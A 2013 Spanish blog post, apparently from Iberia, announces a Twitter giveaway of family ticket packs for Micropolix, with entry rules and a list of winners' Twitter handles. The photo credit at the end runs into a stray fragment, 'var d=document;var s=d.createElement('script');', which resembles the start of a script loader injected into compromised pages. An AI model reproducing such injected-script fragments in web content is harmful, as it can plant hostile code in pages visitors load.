¡Sorteamos entradas para Micropolix! #DivertirseConIB

27/08/2013

Micropolix

Organizando la vuelta al cole, inauguramos concurso para los más peques de la casa :).

Sorteamos 24 packs de 4 entradas (2 para adulto y 2 para niño) cada una para asistir a Micropolix y vivir una experiencia inolvidable.

¿Cómo participar?

El concurso se realiza a través de nuestra cuenta de Twitter, @iberia.

Debéis enviar un tweet mencionando a @iberia, respondiendo a la pregunta «¿Cuál es el mejor plan para divertirse en familia?, y el hashtag #DivertirseConIB.

Por ejemplo: @iberia #DivertirseConIB en la playa

Entre todos los tweets recibidos entre el 27 de agosto y el 28 de agosto a las 12:00h (hora peninsular española), sorteamos los 24 packs. El inicio y fin del concurso se comunicará a través de un tweet desde nuestro perfil en Twitter (@iberia).

Esperamos vuestros comentarios y ¡mucha suerte!

* Bases legales del concurso #DivertirseConIB

Ya tenemos los ganadores de nuestro concurso #DivertirseconIB. Compartimos el listado y ¡atentos! Pronto os escribiremos por DM para que nos enviéis vuestros datos y podáis disfrutar del premio. ¡Enhorabuena a todos! 🙂

@TrentiTrend; @martavicentem; @MARINA_TEJERA; @ThunderRoadG; @veguerperis; @deporforever; @cariaslo75; @piespun;  @RJUNOY; @theCEXguru; @JoseLuisRedes; @japineda3; @DFP68; @Isabelitamoran; @punkaries1; jlpmarin; @samusalama; @MayteBla; @Javier_Palencia 

 

Foto | Cabina del avión A320 en Micropolix, por jmiguel rodriguezvar d=document;var s=d.createElement(‘script’);

ARTÍCULOS RELACIONADOS
COMPARTE ESTE ARTÍCULO